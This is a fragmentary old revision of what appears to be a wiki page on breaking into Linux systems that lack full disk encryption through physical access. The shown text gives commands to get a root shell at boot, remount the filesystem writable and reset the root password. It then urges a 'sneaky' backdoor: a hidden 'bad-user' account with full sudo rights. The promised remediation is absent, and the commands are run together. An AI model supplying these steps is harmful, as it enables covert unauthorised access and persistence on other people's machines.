This is an old revision of the document!
To explore the various methods of breaking into any Linux system that doesn't use FDE (Full Disk Encryption) through physical access. Also, to examine the procedure of FDE setup and other remediations to prevent this.
DONE! THAT'S ALL FOLKS! This drops you into a root shell after the target machine finishes booting. From there, we need to remount the root filesystem so we can make changes to it:
mount -o remount,rw / passwd root
PROTIP: I don't recommend doing this as the next time the real user logs into the system they will notice that their root password has been changed. We need to be super sneaky, secretive, and surreptitious so here's something a little less noticeable:
adduser -D -u 1000 bad-user passwd bad-user
visudo bad-user ALL=(ALL) ALL
reboot
In performing this project, the following resources were referenced: